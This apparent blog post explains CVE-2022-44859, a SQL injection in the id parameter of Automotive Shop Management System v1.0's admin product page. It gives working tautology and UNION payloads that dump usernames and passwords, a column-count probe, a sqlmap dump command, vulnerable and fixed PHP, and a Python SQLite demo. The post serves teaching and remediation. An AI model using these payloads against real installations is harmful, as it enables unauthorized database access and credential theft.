Cybersecurity continues to be a challenging field, especially for small-to-medium businesses that rely on off-the-shelf software like the Automotive Shop Management System (ASMS) v1.0. In this post, we take a deep dive into CVE-2022-44859, a critical SQL injection vulnerability that lets an attacker manipulate the web app's database with a single crafted request.
Let's break down how this SQL injection works, how you can test it, and what you should do to fix it.
- Vulnerable Parameter: id
- Vulnerable File: /asms/admin/products/manage_product.php
How the Vulnerability Works
When an application takes user input and inserts it into a SQL query without validating it, escaping it, or binding it as a parameter, an attacker can craft input that changes the structure of the SQL statement itself. This is SQL injection.
In ASMS v1.0, when the admin product management page is requested with an id parameter, the application inserts that value directly into a SQL query.
Example URL
http://yourserver/asms/admin/products/manage_product.php?id=1
But what if, instead of a normal ID, an attacker sends SQL code?
The Vulnerable Source Code
The public advisory does not reproduce the code. Based on the pattern this family of PHP applications typically follows, the vulnerable handler likely looks like this (a representative reconstruction, not a verified copy of the ASMS source):
<?php
if(isset($_GET['id'])) {
$id = $_GET['id'];                                   // raw query-string value, no validation
$query = "SELECT * FROM products WHERE id = $id";    // value spliced straight into the SQL text
$result = mysqli_query($conn, $query);               // whatever the attacker sent is now parsed as SQL
// ...
}
?>
*Note:* The above code does not use prepared statements or input validation.
With no sanitization, an attacker can supply an id value such as
1 OR 1=1
So, visiting (spaces shown literally here; a browser or tool sends them URL-encoded as %20 or +)...
http://yourserver/asms/admin/products/manage_product.php?id=1 OR 1=1
...makes the application execute
SELECT * FROM products WHERE id = 1 OR 1=1
The OR 1=1 clause is true for every row, so the query returns all products instead of one. The same injection point can be used to read other tables with UNION SELECT and, depending on the privileges of the database account and the behaviour of the driver, to alter or delete data.
### More Advanced Attack (Dumping Usernames/Passwords)
Suppose the attacker wants to read the users table. A UNION-based payload appends a second SELECT to the original query:
http://yourserver/asms/admin/products/manage_product.php?id=-1 UNION SELECT 1, username, password, 4, 5 FROM users --
How it works: id=-1 matches no product, so the result set consists only of the rows produced by the attacker's SELECT. UNION requires both SELECTs to return the same number of columns, so the attacker first finds how many columns the products query returns (for example by increasing n in id=1 ORDER BY n until the query errors) and pads the payload with constants; the column count must match the real products table. The username and password values are then rendered wherever the page displays product fields. The trailing comment discards the rest of the original query; note that MySQL only treats -- as a comment when it is followed by a space, so in a URL it is usually written as --+ or -- -.
Automated Exploit with sqlmap
Open-source tools like sqlmap make this even easier:
sqlmap -u "http://yourserver/asms/admin/products/manage_product.php?id=1" -p id --dump
*This command detects the injection automatically and dumps table contents.* Because the page sits under the admin area, you will normally have to supply a logged-in session cookie with --cookie for the request to reach the vulnerable query at all. Only run this against systems you are authorized to test.
References
- NVD: CVE-2022-44859
- Exploit-DB: 51051
- Original project on Sourcecodester
- OWASP SQL Injection Prevention Cheat Sheet
How to Fix
Never concatenate user input into a SQL string. Use parameterized queries (prepared statements) so the database receives the query text and the value separately, and validate that id is an integer before using it.
Secure PHP Code Example
<?php
if(isset($_GET['id'])) {
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?"); // query text is fixed; ? is a placeholder
$stmt->bind_param("i", $id);                                    // value is bound as an integer, never parsed as SQL
$stmt->execute();
$result = $stmt->get_result();
// ...
}
?>
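The following is an added example, not code from the ASMS project or from the original post. It models the vulnerable handler and the prepared-statement fix above in Python against an in-memory SQLite database, so the tautology and UNION payloads described earlier can be run offline. It also shows the ORDER BY probe an attacker uses to learn how many columns a UNION payload needs. The table names, columns and rows are constructed for illustration and are not the real ASMS schema.

```python
"""Added example (not ASMS project code): SQLite model of the manage_product.php?id=
flaw, the attacker's column-count probe, and the bound-parameter fix."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the app's products and users tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (id INTEGER, name TEXT, price REAL, status INTEGER, date_created TEXT);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Brake pads', 49.0, 1, '2022-11-01');
        INSERT INTO products VALUES (2, 'Oil filter', 12.5, 1, '2022-11-02');
        INSERT INTO products VALUES (3, 'Spark plug', 6.0, 0, '2022-11-03');
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        """
    )
    return conn


def manage_product_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """Mirrors the flawed PHP: the raw GET value is spliced into the SQL text,
    so whatever the attacker sends is parsed as SQL."""
    query = f"SELECT * FROM products WHERE id = {id_param}"
    return conn.execute(query).fetchall()


def count_columns(conn: sqlite3.Connection, max_probe: int = 20) -> int:
    """Attacker-side probe: 'id=1 ORDER BY n' succeeds while n is within the
    column count of the original SELECT and raises an error once it is not.
    The last n that worked is the number of columns a UNION SELECT must supply."""
    found = 0
    for n in range(1, max_probe + 1):
        try:
            manage_product_vulnerable(conn, f"1 ORDER BY {n}")
        except sqlite3.OperationalError:
            break
        found = n
    return found


def manage_product_fixed(conn: sqlite3.Connection, id_param: str) -> list:
    """Mirrors the prepared-statement fix: the value is bound, never parsed as
    SQL, and a non-integer id is rejected instead of being coerced or guessed."""
    try:
        product_id = int(id_param)
    except ValueError:
        return []
    return conn.execute(
        "SELECT * FROM products WHERE id = ?", (product_id,)
    ).fetchall()


# The two payloads from the post, URL-decoded. SQLite accepts a bare trailing
# "--"; MySQL needs "-- " (with a space) or "--+" inside a URL.
TAUTOLOGY = "1 OR 1=1"
UNION_DUMP = "-1 UNION SELECT 1, username, password, 4, 5 FROM users --"

if __name__ == "__main__":
    db = build_db()
    print("columns in products query:", count_columns(db))
    print("vulnerable, tautology:", manage_product_vulnerable(db, TAUTOLOGY))
    print("vulnerable, union dump:", manage_product_vulnerable(db, UNION_DUMP))
    print("fixed, tautology:", manage_product_fixed(db, TAUTOLOGY))
    print("fixed, id=2:", manage_product_fixed(db, "2"))
```

Running the block prints three products for the tautology and the admin username and password hash for the UNION payload when the query is string-built, while the fixed handler returns nothing for either payload and only the requested row for a genuine id. The fixed version rejects non-integer input outright rather than coercing it, which is stricter than bind_param("i") in PHP, where a leading-numeric string such as "1 OR 1=1" would silently become 1.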
Small changes in code like this can protect your business from losing trust, money, and confidential customer data.
Final Thoughts
CVE-2022-44859 is a warning: never trust user input. If you run Automotive Shop Management System or similar web apps, check your source code for this unsafe pattern in every handler that reads a request parameter, and keep your software up to date.
Stay safe and happy coding!
Timeline
Published on: 11/25/2022 18:15:00 UTC
Last modified on: 11/28/2022 19:45:00 UTC